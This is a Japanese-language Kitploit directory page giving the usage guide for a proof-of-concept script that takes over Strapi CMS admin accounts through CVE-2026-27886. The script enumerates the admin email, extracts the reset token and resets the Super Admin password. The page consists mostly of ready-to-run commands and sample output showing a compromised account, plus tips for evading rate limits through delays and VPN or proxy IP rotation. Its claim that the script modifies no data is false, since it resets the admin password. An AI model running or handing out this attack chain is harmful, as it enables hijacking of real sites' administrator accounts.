Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-27886-PoC-Account-Takeover — Account takeover full PoC for CVE-2026-27886 in Strapi CMS | Kitploit
ツール/GitHubGitHub/thesw0rd/cve-2026-27886-poc-account-takeover
ReconnaissancePassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubthesw0rd/cve-2026-27886-poc-account-takeover

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-27886-PoC-Account-Takeover

Account takeover full PoC for CVE-2026-27886 in Strapi CMS

リポジトリを見る
22ヶ月前未レビュー

CVE-2026-27886 自動エクスプロイト - 使用ガイド

このスクリプトが行うこと

4つのHTTPリクエストグループで完全なアカウント乗っ取りチェーンを自動化します:

  1. 脆弱性の検証 - ターゲットが脆弱であることを確認します
  2. メールアドレスの列挙 - ブールオラクルを介して管理者メールを抽出します(約500リクエスト)
  3. パスワードリセットのトリガー - Strapiのパスワード復旧フローを開始します
  4. トークンの窃取 - 40文字のリセットトークンを窃取します(約320リクエスト)
  5. アカウント乗っ取り - 窃取したトークンを使用してSuper AdminのJWTを取得します

基本的な使い方

検証のみモード(安全)

悪用せずにターゲットが脆弱かどうかを確認します:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles --verify-only

完全エクスプロイト(最速)

管理者メールが分からない場合にすべてを自動化します:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles

出力:

root@kitploit:~
[+] Target: https://target/api/articles
[+] Base URL: https://target
[*] Verifying vulnerability...
    [+] Vulnerable: baseline=12, where_test=0
[*] Enumerating admin email...
    [email protected]
[*] Triggering password reset for [email protected]...
    [+] Password reset triggered (HTTP 204)
[*] Extracting 40-char reset token...
    [100%] d1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a
[*] Resetting password with stolen token...
    [+] Password reset successful!
    [+] JWT: eyJhbGciOiJIUzI1NiIs...
    [+] User: [email protected] (ID: 1)

[+] SUCCESS! Admin account compromised.
[+] JWT Token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

メール列挙のスキップ(より高速)

管理者メールを既に知っている場合(約500リクエストを節約):

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles \
  --email [email protected]

カスタムパスワード

デフォルトの代わりにカスタムパスワードを設定します:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles \
  --email [email protected] \
  --password "MyPassword123!"

遅延を追加(レート制限を回避)

ターゲットにレート制限がある場合:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles \
  --delay 0.1

これにより、各リクエスト間に100ミリ秒の遅延が追加されます(完全なエクスプロイトには約2〜3分かかります)。

明示的なベースURL

/admin/* エンドポイントが別のホストにある場合:

root@kitploit:~
./cve-2026-27886-exploit.py https://api.target/articles \
  --base-url https://admin.target

よくある問題

「JSON以外のレスポンス」

  • エンドポイントが間違っている(Strapi Content APIのコレクションではない)
  • 試す: https://target/api/products、https://target/api/articles など

「メールアドレスの列挙に失敗」

  • コレクションが空(updated_by_id 外部キーがない)
  • 管理者ロールがデータベース内の誰とも一致しない
  • 複数存在する場合は別のエンドポイントを試す

「リセットトークンの抽出に失敗」

  • パスワードリセットがトリガーされなかった
  • 推測したのとは異なる管理者メール
  • トークンの有効期限切れ(再試行してください。デフォルトでは約24時間有効です)

レート制限に達した場合

  • --delay 0.05 以上を追加する
  • または VPN/プロキシを使用してIPアドレスをローテーションする

セキュリティに関する注意事項

このスクリプトは:

  • ✅ GET/POSTリクエストのみを行う(データの変更はしない)
  • ✅ 脆弱なStrapiのクエリパラメータバイパスのみを対象とする
  • ✅ Strapiの正規のパスワードリセットエンドポイントを使用する
  • ✅ ターゲット上に保存されたアーティファクトを残さない
  • ⚠️ 非常に目立つ - 800以上のリクエストを連続で送信する(ログで明らか)
ツールをダウンロード